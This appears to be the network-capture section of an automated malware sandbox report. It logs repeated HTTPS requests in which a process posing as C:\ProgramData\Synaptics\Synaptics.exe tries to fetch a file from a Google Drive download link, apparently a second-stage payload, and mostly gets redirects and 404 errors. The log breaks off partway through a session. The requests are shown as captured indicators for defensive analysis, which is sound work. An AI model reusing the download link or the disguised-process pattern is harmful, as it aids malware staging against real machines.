                                                                                        2024-12-24 21:11:19 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:20 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC5fat0U7k49mXI09JjxSeGDj28OoeTy5ZJqKq6K8Cs4rhLBUfQJxLBwlCeMsB5JWtL6
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:19 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-h4r8OeM-7gi2UGyRRhujBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:20 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:20 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="MGgmE5xShd-ZXq3w06GE6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:20 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        10 | 192.168.2.4 | 49767 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:19 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:20 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4Qa4NNLCGpAS_DrTVSpo2ryrYMrKabG7-1bYNIjt0pbA_LW6IyDFaQZixp_3fIAQIQ
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:20 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Daw1Ks3d3Gbpg5phCXiQCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:20 UTC | 147 | IN
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:20 UTC | 1390 | IN
                                                                                        Data Ascii: t Found)!!1</title><style nonce="qJhlihVXreZgS63DW9BbxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:20 UTC | 115 | IN
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        11 | 192.168.2.4 | 49765 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:19 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PzXFjX-HzWsGLD2jjiJKIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        12 | 192.168.2.4 | 49780 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:23 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:23 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-w2Bsvcw1ZEFcDUUNqOe_uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        13 | 192.168.2.4 | 49781 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:23 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:24 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:23 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-M24_8DpgGwSPvClgoveObA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        14 | 192.168.2.4 | 49784 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:26 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-z5U-GkgGAR09EcPhUR4wdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        15 | 192.168.2.4 | 49785 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:26 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        16 | 192.168.2.4 | 49786 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:26 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        17 | 192.168.2.4 | 49787 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:26 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:26 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VjbZc3SevKi6pUwah1X9kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        18 | 192.168.2.4 | 49795 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:29 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4-zQ8CE_aZEzsR8NJ7xj1XwihvuRYoswtbwgvUOLG9sYBAFObal_K9U0nrye83Iiax
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:29 GMT
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vU70lNuHQHCX6pe4HILN1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:29 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:29 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="HW4_chZ11noISJIwsYHKZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:29 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        19 | 192.168.2.4 | 49794 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:29 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:30 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC7yNNFA905L8ELR7XnDMInO6kv1kts9PYnMKUZmMbQxZzEyqWHDn-mdqs3Ulnh3vsl3MjIgC_8
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:29 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-U6geAeSX1Qtc8dYY0KrEKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:30 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:11:30 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="oWqT0vJsPLp69tFYOTeWeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:30 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        20 | 192.168.2.4 | 49796 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:29 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-R-BsY63R_cnnFYinoAREjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        21 | 192.168.2.4 | 49797 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:29 GMT
